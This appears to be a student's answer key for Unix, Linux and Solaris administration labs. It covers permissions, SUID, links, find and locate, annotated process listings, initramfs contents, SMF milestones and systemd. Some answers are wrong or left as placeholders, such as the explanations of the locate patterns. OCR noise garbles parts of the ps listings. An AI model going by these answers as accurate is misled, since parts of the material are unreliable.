1. Describe the main functions of the Unix Kernel.

Answer: The kernel is a set of critical programs that provide an environment where user
processes can execute and interact with system resources in a secure manner.

2. Describe the mechanisms of process instantiation on Unix systems. Answer: A process is created with two system calls: exec() and fork()

3. What information constitutes the metadata of a file? Where is the metadata stored? Answer: Information about the object such as object
type (e.g., regular file, directory, pipe, etc.), access permissions, timestamps, etc. The metadata for the object is stored in a data structure
called an inode.

4. What are the standard directories found in the root of the Unix file system and what is stored within each?

 /etc - most configuration files

 /bin - system executables (called binaries) intended for users
 /sbin - system executables intended for administrators
 /var - dynamic (variable) information, log files, traditionally web files
 /usr - files not part of the OS
 /usr/bin - programs (not part of the OS) intended for users
 /usr/sbin - programs (not part of the OS) intended for admins
 /proc - virtual file system (not on disk) access to read kernel memory
 /boot - boot loader configuration and kernel images. Anything needed before the kernel is running
 /tmp - temporary file storage
 /media - mount point for removable media (like USB drive)

5. What indicators of compromise might one look for when analyzing the file system? Answer: When analyzing processes for anomalies, one of
the important things to look is the location of the executable of any log files or any other open resources.

6. In simple terms, what is a process? Answer: Processes are programs that run in user space. In addition to running user programs,
including application services, processes also run a large number of programs for the OS that do not require kernel space access.

7. List some common processes expected on a standard Linux box, but not on a Solaris box and vice versa. Answer: Page 163

8.

The configuration files for programs are typically located in which directory? /etc

The startup configuration files for the system services are located in which directory for a systemD system? The mechanics of starting or
stopping daemons is performed by a set of shell scripts, often called init scripts or rc scripts. In a typical SystemV Unix system, the directory
named /etc/rc.d/init.d contains the startup script for each system service. This script is provided by the writer of each piece of software and
must be written to accept one parameter - the action to take when script is run. In a typical systemd Unix system, the directory
/etc/systemd/system or /lib/systemd/system typically contains the startup unit for each system service.

The log files for programs are typically found in which directory? /var/log
Information about the running instance of a program can be found in which directory? /proc

The default location for a non-administrative executable is in which directory? /usr/bin

Give the syntax/command to show which groups the intern01 is a member of and list which groups (if any) are returned. #groups intern01

Add a group the CentOS machine called hackers, and provide the syntx/command used. #groupadd hackers

Set the owner of the getUID file to the root account and provide the syntax/command used. #chown root getUID

Set the group of the getUID file to hackers and provide the syntax/command used. #chgrp hackers getUID

Explicitly set the octal permissions of the getUID file to: User/Owner: Read/Write/Execute, Group: Read/Execute, Other: None What
syntax/command was used? #chmod 0750 getUID

Complete the following actions: Add the user intern01 to to the hackers group. What syntax/command was used? #usermod -a -G hackers
intern01

Set the SUID flag on the program getUID. What syntax/command was used? #chmod u+s getUID

Change the user and group owners to match the exhibit. #su root #chown leale:managment data1 #chown enairn:engineer data2 #chown
rsanch:syseng data3

Change the data file permissions to match the exhibit. Use the absolute octel notation.

Command Definition
Cat [FILE] Concatenate file to screen
cd Change directory
cp [source] [target] Copy source to target
File Determine file type
Find Search for files in directory hierarchy
Grep PATTERN [FILE] Print lines matching PATTERN from FILE
Groupadd Create a new group
Groups Print the groups a user belongs to
Head [FILE] Output first 10 lines of a file
Less [File] Similar to more but handles larger files much
faster
Locate Find files by name (Linux)
Ln -s [target] [link_name] Create symbolic link from SOURCE to
LINK_NAME
Ls Directory listing
Man Display online help
Man -k SEARCH_STRING Search for specified SEARCH_STRING in man
 page
More [FILE] Output the contents
st

# touch /tmp/file.txt
# touch /tmp/other.txt
Create a soft (or symbolic) link in the root account's home directory named myTempFile that links to /tmp/file.txt.
What syntax/command was used?

# ln -s /tmp/file.txt myTempFile
What is the expected output of the following?

# echo "hello world" > /tmp/file.txt

# cat myTempFile

hello world
Run the following commands and explain the results:

# rm -f /tmp/file.txt
# ls -l myTempFile
Deleting the original file will break the symbolic link. The output of the ls command will turn the file myTempFile red.

Run the following command and explain the results:

# cat myTempFile
No such file or directory. The original file that the link points to is gone.

Create a hard link in the root account's home directory named otherTempFile that links to /tmp/other.txt.
What syntax/command was used?

ln /tmp/other.txt otherTempFile

# echo -e "one\ntwo\nthree" > /tmp/other.txt

# wc -l otherTempFile
The output of the echo command will be placed in the /tmp/other.txt file with each word on its own line.
The wc command counts the number of lines in the file and displays the number 3.
Run the following commands and explain the results:
# rm -f /tmp/other.txt
# ls -l otherTempFile
A long listing of otherTempFile is displayed but shows no hard link.

Run the following command and explain the results:

# cat otherTempFile
Additionally, explain the critical difference between hard and soft links.
The command cat displays the contents of the file:

one
two
three
In hard links, deleting the sourcefile doesn’t affect the newfile.
Finding files that match certain criteria is a common task on a filesystem. Linux and BSD variants generally install the locate package, which
creates an indexed database of filenames (created using the updatedb command and usually installed as a cron job) and uses the locate
command to find files. The locate command is fast, but it is limited to searching filenames.
All UNIX variants support the find command, and it can search on a much more robust set of characteristics than locate. The search can be
slow as the query is conducted in real time. The find command is powerful but has a bit of a learning curve.
The basic syntax of the find command is shown below:

find <path> <criteria> <actions>

Path
<path> Indicates the path in the filesystem to begin the search and recursively searches unless configured otherwise.

Criteria
-name - Examine the filename. Wildcards (*) can be used.
-user - Examine the owner of the file.
-perm - Examine file permissions.
Note: Multiple criteria are joined with a Boolean 'and' operator by default.

Actions
The actions can be useful but are beyond the scope of this lesson. By default, if no actions are added, the -print action is assumed, which
prints all matches to STDOUT.

Example
The following syntax/command can be used to search the entire filesystem for any file named passwd:

# find / -name passwd

Answer the following:
Run the following commands on the Ubuntu machine as the user nimda and explain the results:

# locate apache2.conf
# locate /etc*apache2.conf
The first locate command will search the entire filesystem for a file named apache2.conf.
The second locate command will only search the directory /etc for a file named apache2.conf.
Run the following commands on the Solaris machine as the user root and explain the results:

locate httpd.conf
locate */httpd.conf
The first locate command will search the entire filesystem for a filename that contains httpd.conf.
The second locate command will search the entire filesystem for a filename that matches exactly httpd.conf.
On the CentOS, Ubuntu and Solaris machines, find all files owned by the root user and document the syntax/command used.
Note: Ubuntu commands will need to be run with the sudo command.

find / -user root

On the CentOS, Ubuntu, and Solaris machines, find all files that meet the criteria below and document the syntax/command used:

 Filename ends in the text log

 Located in the /var directory
 Modified within the past week

Note: Ubuntu commands will need to be run with the sudo command.

find /var -name \*.log -mtime -7 -type f

On the CentOS machine, find all files that have been modified since the start of the day and document the syntax/command used.

find / -daystart -type f

On the CentOS machine, find all files ending with the extension .py and count them. Research and use the nice and ionice commands only to
search when the system is not doing other critical tasks.
Document the syntax/command used and number of files found.

# sudo nice -n 19 ionice -c 3 find / -name \*.py -type f | wc -l

1047
On the CentOS machine, find all files modified before January 1, 2000.
Document the syntax/commands used.

find / -not -newermt "Jan 01, 2000" -ls

On the CentOS machine, find all filenames that contain the text log and pipe the output to the xargs command. As an argument to xargs, use
the grep command, insensitive of case, to search through each of the found files for the text error.
Document the syntax/commands used.

find / -name \*log\* -type f | xargs grep -i “error”

UID PID PPID C STIME TTY TIME CMD

root 1 0 0 Jan20 ? 00:00:00 init [3] The machine is in runlevel 3, which is denoted in brackets next to the init process in this version
of Linux's process listing.
root 2 1 0 Jan20 ? 00:00:00 [migration/0] Each process shown with a /0 at the end has one copy for each processor core on the
system. [migration/0], [ksoftirqd/0], [events/0], just to name three, have an extra copy denoting a dual core processor.
root 3 1 0 Jan20 ? 00:00:00 [ksoftirqd/0)
root 4 1 0 Jan20 ? 00:00:00 [migration/1] have an extra copy denoting a dual core processor.
root 5 1 0 Jan20 ? 00:00:00 [ksoftirqd/1]
root 6 1 0 Jan20 ? 00:00:00 [events/OJ
root 7 1 0 Jan20 ? 00:00:00 [events/1]
root 8 1 0 Jan20 ? 00:00:00 [khelper]
root 9 1 0 Jan20 ? 00:00:00 [kthread]
root 13 9 0 Jan20 ? 00:00:00 [kblockd/0]
root 14 9 0 Jan20 ? 00:00:00 [kblockd/1]
root 15 9 0 Jan20 ? 00:00:00 [kacpid]
root 174 9 0 Jan20 ? 00:00:00 [cqueue/0]
root 175 9 0 Jan20 ? 00:00:00 [cqueue/1]
root 178 9 0 Jan20 ? 00:00:00 [khubd]
root 180 9 0 Jan20 ? 00:00:00 [kseriod]
root 251 9 0 Jan20 ? 00:00:00 [khungtaskd]
root 252 9 0 Jan20 ? 00:00:00 [pdflush] Linux displays kernel threads are denoted with brackets. pdflush runs on Linux systems
running a Linux kernel version from 2.6.0 to 2.6.31. The /proc shows two instances of the pdflush kernel thread.
root 253 9 0 Jan20 ? 00:00:00 [pdflush]
root 254 9 0 Jan20 ? 00:00:00 [kswapd0J
root 255 9 0 Jan20 ? 00:00:00 [aio/0]
root 256 9 0 Jan20 ? 00:00:00 [aio/1]
root 475 9 0 Jan20 ? 00:00:00 [kpsmoused]
root 3619 1 0 Jan20 ? 00:00:00 cupsd
root 3637 1 0 Jan20 ? 00:00:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
ntp 3654 1 0 Jan20 ? 00:00:00 ntpd -u ntp:ntp -p /var/run/ntpd.pid -g
root 3677 1 0 Jan20 ? 00:00:00 sendmail: accepting connections
smmsp 3685 1 0 Jan20 ? 00:00:00 sendmail: Queue runner@01:00:00 for /var/spool/ clientmqueue
root 3700 1 0 Jan20 ? 00:00:00 gpm -m /dev/input/mice -t exps2
root 3714 1 0 Jan20 ? 00:00:00 crond
xfs 3746 1 0 Jan20 ? 00:00:00 xfs -droppriv -daemon
root 3773 1 0 Jan20 ? 00:00:00 /usr/sbin/atd
avahi 3801 1 0 Jan20 ? 00:00:es avahi-daemon: running [core-u03.local]
avahi 3802 3801 0 Jan20 ? 00:00:00 avahi-daemon: chroot helper
root 3833 1 0 Jan20 ? 00:00:00 /usr/sbin/smartd -q never
root 3837 1 0 Jan20 ? 00:00:00 login -- enairn
root 3838 1 0 Jan20 tty2 00:00:00 /sbin/mingetty tty2 A console is a physical connection of a keyboard and display connected to a
computer. Virtual consoles virtualize this same set up, providing the ability for multiple consoles, but in a virtualized space. Getty is the
terminal interface to the system on a console, while mingetty does this for virtual consoles. Root 3837, 3838, and 3839 all spawned from init.
From 3837 a bash shell spawned.
root 3839 1 0 Jan20 tty3 00:00:00 /sbin/mingetty tty3
root 3854 1 0 Jan20 ? 00:00:00 /usr/bin/python -tt /usr/sbin/yum-updatesd
root 3856 1 0 Jan20 ? 00:00:00 /usr/libexec/gam_server
root 4009 1 0 Jan20 ? 00:00:00 /usr/sbin/httpd No, it is not a concern.
They are children of the httpd process (4009). It is not uncommon for such a service to start 5-10 children to handle initial connections and
then spawn more as needed. It is not unusual for servers to downgrade their privileges if they spawn children. However, it would be
concerning if all the processes were running as apacheand there was a child running as root.
apache 4012 4009 0 Jan22 ? 00:00:00 /usr/sbin/httpd
apache 4013 4009 0 Jan22 ? 00:00:00 /usr/sbin/httpd
root 19060 3605 0 10:09 ? 00:00:00 sshd: intern01 [priv]
intern01 19062 19060 0 10:09 ? 00:00:00 sshd: intern01@pts/0 Based on use of login shells, user is logged in via SSH
intern01 19064 19062 0 10:09 pts/0 00:00:00 -bash
enairn 19118 3837 0 10:17 tty1 00:00:00 -bash
intern01 19152 19064 0 10:18 pts/0 00:00:00 ps -ef
intern01 19153 19064 0 10:18 pts/0 00:00:00 more
root 19163 19064 0 10:21 pts/0 00:00:00 su - root
root 19165 19163 0 10:21 pts/0 00:00:00 -bash

More Notes
UID PID PPID C STIME TTY
root 0 0 0 09:35:46 ?
root 5 0 0 09:35:44 ?
root 0 0 0 09:35:47 ?
running from /usr/sbin (Solaris 10 init runs from /sbin).
root 0 0 0 09:35:47 ?
root 0 0 0 09:35:47 ?
root 0 0 0 09:35:47 ?
list came from a Solaris system. The two kernel threads (note they have a PPID of 0 called pageout and fsflush) again indicate that this is a
Solaris system.
root 7 0 0 09:35:47 ?
root 8 0 0 09:35:47 ?
root 117 0 0 09:35:57 ?
root 11 l 0 09:35:48 ?
root 13 1 0 09:35:48 ?
root 620 0 0 09:36:03 ?
netadm 381 l 0 09:36:00 ?
netcfg 40 l 0 09:35:51 ?
root 734 710 0 09:36:06 ?
root 709 0 0 09:36:04 ?
dladm 48 0 0 09:35:53 ?
root 753 0 0 09:36:07 ?
daemon 65 0 0 09:35:54 ?
TIME CMD
0:01 sched day and time did the machine start
0:01 zpool-rpool
0:00 kmem_task kmem_task is a Solaris 11 process. init, which is expected to be present and with a PID of 1 is
0:00 /usr/sbin/init
0:00 pageout
0:00 fsflush The answer is Solaris. The first entry is the kernel thread sched, which indicates that this process
0:00 intrd
0:00 vmtasks
0:00 /usr/lib/pfexecd
0:02 /lib/svc/bin/svc.startd
0:10 /lib/svc/bin/svc.configd
0:00 /usr/sbin/nscd
0:00 /lib/inet/nwamd
0:00 /lib/inet/netcfgd
0:00 /usr/lib/hal/hald-addon-storage
0:00 /usr/lib/hal/hald --daemon yes
0:00 /usr/sbin/dlmgmtd
0:00 /usr/lib/inet/inetd start
0:00 /lib/crypto/kcfd

UIO PID PPID C STIME TTY TIME CMD

root 1 0 0 Jan30 ? 00:00:01 init [3] date the machine start & Runlevel
root 2 1 0 Jan30 ? 00:00:00 [migration/0]
root 3 1 0 Jan30 ? 00:00:00 [ksoftirqd/0]
root 4 1 0 Jan30 ? 00:00:00 [migration/1]
root 5 1 0 Jan30 ? 00:00:00 [ksoftirqd/1]
root 6 1 0 Jan30 ? 00:00:00 [events/0]
root 7 1 0 Jan30 ? 00:00:00 [events/1]
root 8 0 0 Jan30 ? 00:00:00 [khelper]
root 9 0 0 Jan30 ? 00:00:00 [kthread]
root 13 9 0 Jan30 ? 00:00:00 [kblockd/0]
root 14 9 0 Jan30 ? 00:00:00 [kblockd/1]
root 15 9 0 Jan30 ? 00:00:00 [kacpid]
root 174 9 0 Jan30 ? 08:00:00 [cqueue/0]
root 175 9 0 Jan30 ? 00:00:08 [cqueue/1]
root 178 9 0 Jan30 ? 00:00:08 [khubd]
root 180 9 0 Jan30 ? 00:00:00 [kseriod]
root 251 9 0 Jan30 ? 00:00:00 [khungtaskd]
root 252 9 0 Jan30 ? 00:00:00 [pdflush]
root 253 9 0 Jan30 ? 00:00:00 [pdflush]
root 254 9 0 Jan30 ? 00:00:00 [kswapd0]
root 255 9 0 Jan30 ? 00:00:00 [aio/0]
root 256 9 0 Jan30 ? 00:00:00 [aio/1]
root 475 9 0 Jan30 ? 00:00:00 [kpsmoused]
root 516 9 0 Jan30 ? 00:00:00 [mpt_poll_0]
root 517 9 0 Jan30 ? 00:00:00 [mpt/0]
root 518 9 0 Jan30 ? 00:00:00 [scsi_eh_0]
root 522 9 0 Jan30 ? 00:00:00 [ata/0]
root 523 9 0 Jan30 ? 00:00:00 [ata/1]
root 524 9 0 Jan30 ? 00:00:00 [ata_aux]
root 531 9 0 Jan30 ? 00:00:00 [kstriped]
root 544 9 0 Jan30 ? 00:00:00 [ksnapd]
root 568 9 0 Jan30 ? 00:00:00 [kjou rnald]
root 594 9 0 Jan30 ? 00:00:00 [kauditd]
root 627 1 0 Jan30 ? 00:00:00 /sbin/udevd -d
intern01 1768 3843 0 06:32 tty1 00:00:00 -bash Based on the use of a dash (-) indicating login shells, user sessions are logged into the
system
root 1819 3859 0 06:37 ? 00:00:00 /usr/bin/python -tt /usr/libexec
intern01 1824 6378 0 06:37 pts/0 00:00:00 ps -ef Did the user who is logged in start any processes? The correct answer is: intern01 1824
6378 0 06:37 pts/0 00:00:00 ps -ef, Tracing the PPID 6378 from the logged in user intern01, we see that intern01 ran ps –ef.

root 1906 9 0 Jan30 ? 00:00:00 [kmpathd/0]

root 1907 9 0 Jan30 ? 00:00:00 [kmpathd/1]
root 1908 9 0 Jan30 ? 00:00:00 [kmpath_handlerd]
root 1930 9 0 Jan30 ? 00:00:00 [kjournald]
root 2373 9 0 Jan30 ? 00:00:01 [vnvnemctl]
root 2546 1 0 Jan30 ? 00:00:14 /usr/sbin/vmtoolsd
root 2597 1 0 Jan30 ? 00:00:00 /usr/11b/vmware-vgauth/VGAuthSer
root 2690 9 0 Jan30 ? 00:00:00 [iscsi_eh]
root 2732 9 0 Jan30 ? 00:00:00 [cnic_wq]
root 2738 9 0 Jan30 ? 00:00:00 [bnx2i_thread/0]
root 2739 9 0 Jan30 ? 00:00:00 [bnx21_thread/1]
root 2750 9 0 Jan30 ? 00:00:00 [ib_addr]
root 2761 9 0 Jan30 ? 00:00:00 [ib_mcast]
root 2762 9 0 Jan30 ? 00:00:00 [ib_inform]
root 2763 9 0 Jan30 ? 00:00:00 [local_sa]
root 2767 9 0 Jan30 ? 00:00:00 [iw_cm_wq]
root 2771 9 0 Jan30 ? 00:00:00 [ib_cm/0]
root 2772 9 0 Jan30 ? 00:00:00 [ib_cm/1]
root 2776 9 0 Jan30 ? 08:00:00 [rdma_cm]
root 2794 1 0 Jan30 ? 00:00:00 iscsiuio
root 2799 1 0 Jan30 ? 00:00:00 iscsid
root 2801 1 0 Jan30 ? 00:00:00 iscsid
root 3141 1 0 Jan30 ? 00:00:00 auditd
root 3143 3141 0 Jan30 ? 00:00:00 /sbin/audispd
root 3226 1 0 Jan30 ? 00:00:01 irqbalance
rpc 3259 1 0 Jan30 ? 00:00:00 portmap
root 3294 9 0 Jan30 ? 00:00:00 [rpciod/0]
root 3295 9 0 Jan30 ? 00:00:00 [rpciod/1]
rpcuser 3303 1 0 Jan30 ? 00:00:00 rpc.statd
root 3341 1 0 Jan30 ? 00:00:00 rpc.idmapd
dbus 3373 1 0 Jan30 ? 00:00:00 dbus-daemon --system
root 3450 1 0 Jan30 ? 00:00:00 pcscd
root 3465 1 0 Jan30 ? 00:00:00 /usr/sbin/acpid
68 3484 1 0 Jan30 ? 00:00:03 hald
root 3485 3484 0 Jan30 ? 00:00:00 hald-runner
68 3493 3485 0 Jan30 ? 00:00:00 hald-addon-acpi: listening on ac
68 3499 3485 0 Jan30 ? 00:00:00 hald-addon-keyboard: listening o
root 3508 3485 0 Jan30 ? 00:00:40 hald-addon-storage: polling /dev
root 3557 1 0 Jan30 ? 00:00:00 /sbin/rsyslogd -i /var/run/rsysl
root 3586 1 0 Jan30 ? 00:00:00 automount
root 3611 1 0 Jan30 ? 00:00:00 /usr/sbin/sshd
root 3625 1 0 Jan30 ? 00:00:00 cupsd
root 3643 1 0 Jan30 ? 00:00:00 xinetd -stayalive -pidfile /var/
ntp 3660 1 0 Jan30 ? 00:00:00 ntpd -u ntp:ntp -p /var/run/ntpd
root 3683 1 0 Jan30 ? 00:00:00 sendmail: accepting connections
smmsp 3691 1 0 Jan30 ? 00:00:00 sendmail: Queue runner@01:00:00
root 3706 1 0 Jan30 ? 00:00:00 gpm -m /dev/input/mice -t exps2
root 3720 1 0 Jan30 ? 00:00:00 crond
xfs 3752 1 0 Jan30 ? 00:00:00 xfs -droppriv -daemon
root 3779 1 0 Jan30 ? 00:00:00 /usr/sbin/atd
avahi 3807 1 0 Jan30 ? 00:00:00 avahi-daemon: running [core-u03.
avahi 3808 3807 0 Jan30 ? 00:00:00 avahi-daemon: chroot helper
root 3839 1 0 Jan30 ? 00:00:00 /usr/sbin/smartd -q never
root 3843 1 0 Jan30 ? 00:00:00 login -- intern01
root 3844 1 0 Jan30 tty2 00:00:00 /sbin/mingetty tty2
root 3845 1 0 Jan30 tty3 00:00:00 /sbin/mingetty tty3
root 3846 1 0 Jan30 tty4 00:00:00 /sbin/mingetty tty4
root 3851 1 0 Jan30 tty5 00:00:00 /sbin/mingetty tty5
root 3856 1 0 Jan30 tty6 00:00:00 /sbin/mingetty tty6
root 3859 1 0 Jan30 ? 00:00:00 /usr/bin/python -tt /usr/sbin/yu
root 3861 1 0 Jan30 ? 00:00:00 /usr/libexec/gam_server
root 6374 3611 0 Jan30 ? 00:00:00 sshd: intern01 [priv]
intern01 6377 6374 0 Jan30 ? 00:00:00 sshd: intern01@pts/0
intern01 6378 6377 0 Jan30 pts/0 00:00:00 -bash Based on the use of a dash (-) indicating login shells, user sessions are logged into the
system

$ cd /tmp
$ touch ford.txt
$ ln -s ford.txt link_ford.txt
$ rm -f ford.txt
$ ls -alg link_ford.txt
lrwxrwxrwx 1 root 9 May 19 13:09 link_ford.txt -> ford.txt
3. Modify and change

4. Access

What timestamps will update on the directory when using tab completion?

A directories atlme updates whenever its contents are read. The system does this when it uses tab completion to display the filenames of the
directory.

Susan executes the following process:

-r-sr-s—x 1 billy admin 0 Aug 14 10:09 file1
Susan belongs to the following groups (and only member of the developers group):
# groups susan
susan : susan admin developers
The resulting process will run as what user and group?
User: billy
Group: admin
Provide a command that will search the entire file system for all files that are both owned by user rootand have their SUID bit set

sudo find / -user root -perm -4000

OR
sudo find / -perm -4000 -user root
Run the following commands on the CentOS machine to decompress the initrd file:
# cd ~
# mkdir initrd_ex
# cd initrd_ex
# cp /boot/initramfs-3.10.0-693.el7.x86_64.img ./initramfs.img
# mkdir contents
# cd contents
# /usr/lib/dracut/skipcpio ../initramfs.img | gunzip | cpio -id
How many binaries are available before the kernel loads?
The following output contains all the binaries that are available before the kernel loads.
# cd ~/initrd_ex/contents/bin
# ls | wc -l
59
# ls -l
total 7148
lrwxrwxrwx. 1 root root 4 Nov 2 17:32 awk -> gawk
-rwxr-xr-x. 1 root root 960608 Nov 2 17:32 bash
-rwxr-xr-x. 1 root root 54080 Nov 2 17:32 cat
-rwxr-xr-x. 1 root root 155168 Nov 2 17:32 cp
-rwxr-xr-x. 1 root root 49640 Nov 2 17:32 dmesg
-rwxr-xr-x. 1 root root 2714 Nov 2 17:32 dracut-cmdline
-rwxr-xr-x. 1 root root 422 Nov 2 17:32 dracut-cmdline-ask
-rwxr-xr-x. 1 root root 1342 Nov 2 17:32 dracut-emergency
-rwxr-xr-x. 1 root root 2223 Nov 2 17:32 dracut-initqueue
-rwxr-xr-x. 1 root root 1170 Nov 2 17:32 dracut-mount
-rwxr-xr-x. 1 root root 622 Nov 2 17:32 dracut-pre-mount
-rwxr-xr-x. 1 root root 1175 Nov 2 17:32 dracut-pre-pivot
-rwxr-xr-x. 1 root root 588 Nov 2 17:32 dracut-pre-trigger
-rwxr-xr-x. 1 root root 1523 Nov 2 17:32 dracut-pre-udev
-rwxr-xr-x. 1 root root 33072 Nov 2 17:32 echo
-rwxr-xr-x. 1 root root 59680 Nov 2 17:32 findmnt
-rwxr-xr-x. 1 root root 24400 Nov 2 17:32 flock
-rwxr-xr-x. 1 root root 428584 Nov 2 17:32 gawk
-rwxr-xr-x. 1 root root 159024 Nov 2 17:32 grep
-rwxr-xr-x. 1 root root 100800 Nov 2 17:32 gzip
-rwxr-xr-x. 1 root root 483296 Nov 2 17:32 journalctl
-rwxr-xr-x. 1 root root 11424 Nov 2 17:32 kbd_mode
-rwxr-xr-x. 1 root root 150736 Nov 2 17:32 kmod
-rwxr-xr-x. 1 root root 158240 Nov 2 17:32 less
-rwxr-xr-x. 1 root root 58608 Nov 2 17:32 ln
-rwxr-xr-x. 1 root root 113128 Nov 2 17:32 loadkeys
lrwxrwxrwx. 1 root root 4 Nov 2 17:32 loginctl -> true
-rwxr-xr-x. 1 root root 117656 Nov 2 17:32 ls
-rwxr-xr-x. 1 root root 79768 Nov 2 17:32 mkdir
-rwxr-xr-x. 1 root root 63056 Nov 2 17:32 mkfifo
-rwxr-xr-x. 1 root root 67200 Nov 2 17:32 mknod
-rwsr-xr-x. 1 root root 44232 Nov 2 17:32 mount
-rwxr-xr-x. 1 root root 130344 Nov 2 17:32 mv
-rwxr-xr-x. 1 root root 66176 Nov 2 17:32 ping
-rwxr-xr-x. 1 root root 40720 Nov 2 17:32 plymouth
-rwxr-xr-x. 1 root root 100120 Nov 2 17:32 ps
-rwxr-xr-x. 1 root root 41800 Nov 2 17:32 readlink
-rwxr-xr-x. 1 root root 62864 Nov 2 17:32 rm
-rwxr-xr-x. 1 root root 76016 Nov 2 17:32 sed
-rwxr-xr-x. 1 root root 41344 Nov 2 17:32 setfont
-rwxr-xr-x. 1 root root 11488 Nov 2 17:32 setsid
lrwxrwxrwx. 1 root root 4 Nov 2 17:32 sh -> bash
-rwxr-xr-x. 1 root root 33112 Nov 2 17:32 sleep
-rwxr-xr-x. 1 root root 74904 Nov 2 17:32 stat
-rwxr-xr-x. 1 root root 70264 Nov 2 17:32 stty
-rwxr-xr-x. 1 root root 641808 Nov 2 17:32 systemctl
-rwxr-xr-x. 1 root root 283896 Nov 2 17:32 systemd-cgls
-rwxr-xr-x. 1 root root 37096 Nov 2 17:32 systemd-escape
-rwxr-xr-x. 1 root root 350176 Nov 2 17:32 systemd-run
-rwxr-xr-x. 1 root root 120560 Nov 2 17:32 systemd-tmpfiles
-rwxr-xr-x. 1 root root 154600 Nov 2 17:32 teamd
-rwxr-xr-x. 1 root root 29664 Nov 2 17:32 teamdctl
-rwxr-xr-x. 1 root root 19568 Nov 2 17:32 teamnl
-rwxr-xr-x. 1 root root 45656 Nov 2 17:32 tr
-rwxr-xr-x. 1 root root 28920 Nov 2 17:32 true
-rwxr-xr-x. 1 root root 373696 Nov 2 17:32 udevadm
-rwsr-xr-x. 1 root root 31968 Nov 2 17:32 umount
-rwxr-xr-x. 1 root root 33080 Nov 2 17:32 uname
-rwxr-xr-x. 1 root root 910136 Nov 2 17:32 vi
Which binaries need to be available before the kernel loads? List the binaries or the command used to view them.

# ls /root/initrd_ex/contents/bin
awk
findmnt
mknod
systemctl
bash
flock
mount
systemd-cgls
cat
gawk
mv
systemd-escape
cp
grep
ping
systemd-run
dmesg
gzip
plymouth
systemd-tmpfiles
dracut-cmdline
journalctl
ps
teamd
dracut-cmdline-ask
kbd_mode
readlink
teamdctl
dracut-emergency
kmod
rm
teamnl
dracut-initqueue
less
sed
tr
dracut-mount
ln
setfont
true
dracut-pre-mount
loadkeys
setsid
udevadm
dracut-pre-pivot
loginctl
sh
umount
dracut-pre-trigger
ls
sleep
uname
dracut-pre-udev
mkdir
stat
vi
echo
mkfifo
stty
Explain what the following command does:
# /usr/lib/dracut/skipcpio ../initramfs.img | gunzip | cpio -id

 The skipcpio command will extract concatenated cpio archives such as the initramfs.img file.
 The gunzip command then unzips the archive.
 The cpio command will copy files out of the unzipped archived.

What is the first process spawned by Solaris after the kernel is loaded?

# ps -elf
FS UID PID PPID C PRI NI ADDR SZ STIME TTY TIME CMD
1 T root 0 0 0 0 SY ? 0 Oct 30 ? 100:11 sched
What are the initial processes in SysV and SMF, respectively?

The first process in SysV is init.

The first process in SMF is sched.
Examine the output of the process list to determine the file paths in which the svc.startd and svc.configddaemons are located.
Document the file paths below.
Run the following command to identify the service file paths.
# ps -elf | grep svc
/lib/svc/bin/svc.startd
/lib/svc/bin/svc.configd
What command shows you the current runlevel?
What is the current runlevel?
# who -r
. run-level 3 oct 30 12:54 3 0 S
Complete the following actions and document the syntax/commands used:

 Change to runlevel 2
 Verify the runlevel has changed
 Capture the state of the services using the svcs command to a file named s1.txt
 Capture the process list using the ps -efcommand to a file named p1.txt

# init 2
# who -r
# svcs > s1.txt
# ps -ef > p1.txt
Complete the following actions and document the commands/syntax used:

 Change to runlevel 3
 Capture the state of the services using the svcs command to a file named s2.txt
 Capture the process list using the ps -ef command to a file named p2.txt
 Use the diff command to compare the contents of the services and process files
 Record how many services are running in runlevel 3 that are not running in runlevel 2
 # init 3
# svcs > s2.txt
# ps -ef > p2.txt
# diff s1.txt s2.txt
# diff p1.txt p2.txt
Using the svcs command, identify how many dependencies the sendmail service has and record the syntax/command used.

# svcs -l sendmail | grep dep | wc -l

2
Start the sendmail service with the following command:
svcadm enable sendmail
Using the svcs command to identify how many processes are spawned by the sendmail service and record the syntax/command used.
# svcs -p sendmail
STATE STIME FMRI
online 8:19:53 svc:/network/smtp:sendmail
8:20:53 1071 sendmail
8:20:53 1073 sendmail

Instruction
Telnet into the sendmail server with the following command:
# telnet 127.0.0.1 25

The sendmail server will give a response. Type the following to exit telnet:
<CTRL> + ]
quit

Stop the sendmail service with the following command:

# svcadm disable sendmail
Try to telnet into the sendmail server using the following command:
# telnet 127.0.0.1 25
Record the error message given by telnet at this point.

Use the svcadm command to re-enable the sendmailservice.

# svcadm enable sendmail
Connection refused

Using the svcs milestone command, identify how many system milestones are present and record the syntax/command used.

# svcs milestone* | grep milestone | wc -l

7
Change the current default milestone to single-user mode and verify the runlevel with the following commands:
# svcadm milestone svc:/milestone/single-user:default
# who -r

Answer the following questions:

 Does the system go into single-user-mode?

 What is the current runlevel expected to be?
 What is the current runlevel?

Note: Changing milestones directly can lead to system unstable system states. Milestones are not designed to be backtracked into (i.e., a
system should not be switched back into single-user-mode once in multi-user-mode).
The system remained in run-level 3 (multi-user) instead of going to run-level 1 (single user).

Run the following command and record any change(s):

# svcadm milestone -d all
Changed the default milestone for system boot to enable all installed daemons.

Reboot the machine. Record the runlevel and milestone the machine booted into and the syntax/command used

# who -r
. run-level multi-user Nov 3 09:26 S 0 0
Change to the all milestone and document the syntax/command used.

# svcadm milestone all

What type of services start in the all milestone?

# svcs -a
The all milestone will start all enabled services.
Use the svcs command to determine whether the Apache web server is enabled for the multi-user milestone and record the syntax/command
used

# svcs | grep apache

legacy_run 10:03:37 lrc:/etc/rc3_d/S50Apache
online 10:03:35 svc:/network/cswapache2:default
# svcs | grep multi
online 10:03:37 svc:/milestone/multi-user:default
online 10:03:37 svc:/milestone/multi-user-server:default
The time when the Apache web server started is before that of multi-user and there is an indication that Apache will start up for runlevel 3.
Identify the runlevel the system is in. Change the milestones and record whether the runlevel was affected.
Run the following command when finished to return the machine to the original milestone:
# svcadm milestone -d svc:/milestone/multi-user:default
# who -r
. run-level S Nov 3 09:26 S 0 0
# svcadm milestone svc:/milestone/multi-user:default
# init 6
Yes, changing the milestones affect the runlevel.
Log on to the Solaris 10 machine EX-SOL10 (10.10.1.50) as root.
SSH into the CentOS machine EX-CENTOS7 (10.10.1.40) as intern01 the su to root.
multi-user.target or run level 3

What syntax/command was used to determine the default run level of the CentOS machine?

systemctl get-default
What syntax/command shows all active services on the machine?

systemctl list-units
What syntax/command shows the status of the crondservice?

systemctl status crond.service

systemctl status crond
What is the path of the configuration file for the crondservice?
/usr/lib/systemd/system/crond.service
What syntax/command shows the status of the sshdservice?

systemctl status sshd.service

systemctl status sshd
